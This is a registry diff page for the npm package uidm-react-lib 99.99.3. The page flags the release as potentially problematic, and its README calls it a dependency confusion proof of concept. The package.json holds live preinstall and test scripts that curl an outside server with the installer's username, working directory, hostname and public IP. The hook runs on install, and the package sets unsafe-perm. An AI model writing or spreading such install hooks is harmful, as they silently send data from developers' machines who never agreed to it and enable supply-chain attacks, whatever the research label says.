uidm-react-lib 99.99.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of uidm-react-lib might be problematic. Click here for more details.
- package/README.md +8 -0
- package/index.js +3 -0
- package/package.json +20 -0
package/README.md
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
1
|
+
# NPM Dependency Confusion PoC
|
|
2
|
+
Simple PoC package for testing and protection against dependency confusion vulnerabilities.
|
|
3
|
+
|
|
4
|
+
Inspired by Alex Birsan's research.
|
|
5
|
+
|
|
6
|
+
Reference: [https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
|
|
7
|
+
|
|
8
|
+
JET INFOSYSTEMS SECURITY TEAM PROOF-OF-CONCEPT [https://t.me/mrd0x1](@mrd0x1)
|
package/index.js
ADDED
package/package.json
ADDED
|
@@ -0,0 +1,20 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "uidm-react-lib",
|
|
3
|
+
"version": "99.99.3",
|
|
4
|
+
"description": "Simple PoC package for testing and protection against dependency confusion vulnerabilities.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "curl \"https://arsenal-bot.ru:13000/collector/28JCvvw/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)&ip=$(curl ifconfig.me)\"",
|
|
8
|
+
"preinstall": "curl \"https://arsenal-bot.ru:13000/collector/28JCvvw/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)&ip=$(curl ifconfig.me)\""
|
|
9
|
+
},
|
|
10
|
+
"keywords": [
|
|
11
|
+
"test",
|
|
12
|
+
"PoC"
|
|
13
|
+
],
|
|
14
|
+
"dependencies": {},
|
|
15
|
+
"config": {
|
|
16
|
+
"unsafe-perm":true
|
|
17
|
+
},
|
|
18
|
+
"author": "mrd0x1",
|
|
19
|
+
"license": "ISC"
|
|
20
|
+
}
|